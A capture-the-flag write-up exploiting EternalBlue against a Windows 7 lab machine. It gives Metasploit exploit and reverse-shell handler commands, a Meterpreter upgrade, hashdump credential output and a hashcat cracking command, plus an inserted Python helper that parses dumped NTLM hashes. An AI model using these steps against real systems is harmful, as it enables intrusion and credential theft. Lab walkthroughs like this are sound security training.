Exploiting EternalBlue in a Windows 7 Lab (and Wrestling With Meterpreter)
The Blue CTF targets a Windows 7 machine vulnerable to EternalBlue. The goal is straightforward: exploit SMB, gain access, escalate privileges, and locate the flags. In practice, the interesting part turns out to be dealing with some quirks in Metasploit Framework.
🔗 https://tryhackme.com/room/blue
🔍 Initial Recon
A port scan reveals the following:
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
25/tcp closed smtp
80/tcp closed http
110/tcp closed pop3
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp closed https
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
The important ports here are 139 and 445, which expose SMB services on a Windows 7 machine. That combination strongly suggests the possibility of an MS17-010 vulnerability.
💣 A Quick History of EternalBlue
Before exploiting the vulnerability, it’s worth understanding why EternalBlue is such a famous exploit.
Originally, EternalBlue was not a public exploit at all. It was a cyber weapon developed by the National Security Agency as part of its offensive hacking toolkit. The exploit targeted a flaw in the SMBv1 protocol used by Microsoft Windows systems for file sharing.
For years it remained classified: until 2017.
A mysterious group calling itself The Shadow Brokers began releasing stolen cyber tools believed to belong to the NSA’s Equation Group. In April 2017 they published a large archive containing EternalBlue and several other offensive exploits.
Just a month later, attackers used EternalBlue to launch the WannaCry ransomware worm.
The attack spread automatically across networks by exploiting vulnerable SMB services. Within hours it infected more than 200,000 systems in over 150 countries.
One of the most visible victims was the UK’s National Health Service, where hospitals were forced to cancel appointments and divert emergency patients after their computers were locked by ransomware.
Shortly afterward, EternalBlue appeared again in the NotPetya attack. Unlike WannaCry, NotPetya was designed not for ransom but for destruction, wiping systems and causing billions of dollars in damage to companies such as Maersk and Merck & Co..
Even years later, EternalBlue continues to appear in penetration tests and occasionally in real-world attacks because:
- many legacy systems remain unpatched
- SMBv1 is still enabled in some environments
- organizations continue to run outdated Windows versions
For security professionals, EternalBlue remains a classic case study in vulnerability management, cyber-weapon leakage, and large-scale cyber incidents.
🚀 Launching the Exploit
Start Metasploit:
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
Running show options lists the parameters we can configure. We need to use set RHOST target (Remote Host) and set LHOST myIP (Local Host) to specify the target machine’s IP and our attacking machine’s IP respectively.
One quirk appears immediately: Metasploit does not consult /etc/hosts, so the target IP and our own IP must be entered manually.
Another issue will appear if you attempt to start your listener manually using nc -lvnp 4444. Starting a listener manually conflicts with Metasploit’s handler and the exploit will fail. Don’t ask me how I know. You have been warned!
exploit
Eventually the exploit lands a shell on the target system.

🔧 Upgrading the Shell to Meterpreter
At the Windows prompt, press:
Ctrl + Z
This backgrounds the shell session.
Then run:
sessions -u 1
This triggers the shell-to-Meterpreter upgrade:
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
In our instance the upgrade crashes, which turns out to be a common issue. EternalBlue frequently lands in an unstable process that dies during upgrade attempts.
We’re going to hear a lot about sessions in this CTF. What are they? A Meterpreter session is an active, interactive connection between the attacker’s machine and a compromised target system created by a Meterpreter payload from the Metasploit Framework. 💻 You can have multiple sessions and select between them.
Running sessions shows the original shell is still active.
The recommended workaround is to launch a dedicated handler:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 4433
run -j
Then manually upgrade the shell:
use post/multi/manage/shell_to_meterpreter
After configuring the RHOST and LHOST options manually using set, the upgrade succeeds.
Speaking of quirks: sometimes Metasploit does not redraw the prompt. It can look like the console is frozen or that the process is hanging. Just start typing and entering commands as if a prompt exists. If the process is not frozen, the instructions will go through.
Select and interact with the new session:
sessions -i 2
Now a proper Meterpreter session is active.
🤷What’s the difference?
What’s the difference between the first session and the Meterpreter session? The first session is usually a basic command shell created directly by the exploit.
What it is:
- A standard Windows command shell (cmd.exe)
- Limited interaction
- Basically the same as if you connected through a raw remote terminal
Capabilities:
- Run normal Windows commands (dir, whoami, ipconfig)
- Navigate directories
- Execute programs
Limitations:
- No built‑in post‑exploitation tools
- No easy privilege escalation modules
- No filesystem helpers
- Harder to manage files or processes
🧰 The Meterpreter Session
A Meterpreter session is a full post‑exploitation payload provided by Metasploit Framework.
Instead of just giving you a shell, it loads a dynamic agent directly into memory on the target.
Capabilities:
- Advanced filesystem commands (ls, download, upload)
- Credential dumping
- Process migration
- Screenshot and webcam capture
- Pivoting and port forwarding
- Privilege escalation helpers
- In‑memory execution (stealthier)
Common commands include:
pwd
ls
getuid
hashdump
ps
migrate
⚠️Important: Meterpreter ≠ Elevated Privileges!
Meterpreter is powerful, but it doesn’t automatically grant you elevated privileges. It’s just a payload and post‑exploitation framework provided by Metasploit Framework. The privileges you get in a Meterpreter session are exactly the same as the process that launched it.
⚙️ How Privileges Actually Work
When a Meterpreter session opens, it inherits the permissions of the exploited process.
Examples:
| Exploited Service | Meterpreter Privilege |
|---|---|
| IIS web server | IIS APPPOOL or NETWORK SERVICE |
| User application | Normal user |
| SMB service exploit | Often NT AUTHORITY\SYSTEM |
This is why exploits like EternalBlue are powerful — they target kernel‑level SMB services, which run as SYSTEM, so the session often starts with maximum privileges already. You can check your privilege with getuid. We are indeed SYSTEM; no privilege escalation is necessary in this CTF!
🔑 Dumping Password Hashes
First, list processes:
ps
We’ve already seen that our hold on the target machine is tenuous; the sessions are prone to failure. We can mitigate that instability by migrating the session into a more stable process:
migrate <PID_of_powershell>
Next, dump password hashes:
hashdump
Example output:
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Format:
username:RID:LMhash:NTLMhash:::
So we really only need the following:
ffb43f0de35be4d9917ac0cc8ad57f8d
Crack it using Hashcat. Use mode 1000 since it’s an NTLM hash:
hashcat -m 1000 jonHash.txt /usr/share/wordlists/rockyou.txt
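As an added example (not part of the original write-up), here is a small Python helper that parses a hashdump line in the username:RID:LMhash:NTLMhash::: format shown above, flags the well-known empty-LM value, and verifies a candidate password against the NT hash by computing NTLM itself (MD4 over the UTF-16LE password, which is exactly what hashcat mode 1000 cracks). The sample line, the user name labuser and all function names are constructed for this example; the NT hash in the sample is that of the word "password".

```python
import struct

# LM hash of an empty password: appears when LM hashes are disabled (the usual case on Windows 7).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

def _md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable on OpenSSL 3 builds."""
    M = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & M
    bits = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bits)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # (round function, additive constant, shift schedule, message-word order)
        (F, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[k] + const) & M, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate register roles for the next step
        a, b, c, d = (a + aa) & M, (b + bb) & M, (c + cc) & M, (d + dd) & M
    return struct.pack("<4I", a, b, c, d)

def ntlm_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoded password (hashcat mode 1000)."""
    return _md4(password.encode("utf-16-le")).hex()

def parse_hashdump_line(line: str) -> dict:
    """Parse one pwdump-style line: user:RID:LMhash:NTLMhash:::"""
    parts = line.strip().split(":")
    if len(parts) < 4:
        raise ValueError(f"not a pwdump line: {line!r}")
    user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
    for h in (lm, nt):
        if len(h) != 32 or any(ch not in "0123456789abcdef" for ch in h):
            raise ValueError(f"bad hash field in {line!r}")
    return {"user": user, "rid": rid, "lm": lm, "nt": nt,
            "lm_empty": lm == EMPTY_LM,    # only the NT hash is meaningful when LM is blank
            "builtin_admin": rid == 500}   # RID 500 is the built-in Administrator account

def check_candidate(entry: dict, password: str) -> bool:
    """Verify a recovered candidate (e.g. a cracking result) against the entry's NT hash."""
    return ntlm_hash(password) == entry["nt"]

# Constructed sample line: empty LM hash, NT hash of the word "password".
SAMPLE = "labuser:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"
```

The same check also tells a defender whether a dumped NT hash corresponds to a password on a known-weak list without sending anything to an external tool.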
🧭 Navigating Windows as SYSTEM
Again, our session is running as NT AUTHORITY\SYSTEM, which should provide full access.
However, simple commands sometimes fail. For example:
dir C:\Users\Jon\My Documents
returns an access error.
This turns out to be a Windows filesystem quirk involving junction directories. Some folders redirect internally, and tools like Meterpreter do not always resolve them correctly.
Another fun quirk happens when traversing paths. Think you can change directories as per usual? Lol, no, of course not. Sometimes double backslashes are required:
cd C:\\Users\\Jon\\Documents
When you interact through Meterpreter inside the Metasploit Framework, the command parser sometimes treats the backslash as an escape character. That means a single \ can be interpreted as an escape indicator or part of a string control sequence. To ensure the backslash is interpreted literally, it can require escaping the escape character. Fun, right?
🖥 Dropping Into a Windows Shell
If the fun becomes too much for you, dropping into a native Windows shell can help tone down the quirkiness:
shell
We can now change directories as per usual. Poke around to find the flags.
📌 Notes From the Lab
A few reminders that come out of this exercise:
- type is the Windows equivalent of cat
- shell drops into a Windows command prompt
- exit returns to Meterpreter
- Windows sometimes contains both Documents and My Documents, which can be confusing
- Meterpreter sessions can be fragile
- Meterpreter sometimes fails to redraw the prompt; go ahead and enter in commands to determine if it’s hanging
- The muscle memory that tells you to hit ctrl-c in order to stop a problematic process may betray you; it will stop Meterpreter, killing your session
- In Meterpreter, sometimes you have to escape escape characters and construct paths with double slashes, e.g.
cd C:\\Users\\Jon\\Documents
🧠 Final Thoughts
Getting the flags for the Blue CTF is relatively straightforward once SMB exposure is identified. The more interesting challenge lies in post-exploitation navigation and overcoming Meterpreter quirks.
Meterpreter occasionally struggles with Windows junction directories, EternalBlue shells can be fragile during upgrades, and the Metasploit console sometimes fails to redraw its prompt. Once those quirks are understood, the rest of the exercise falls into place. Another one in the books!
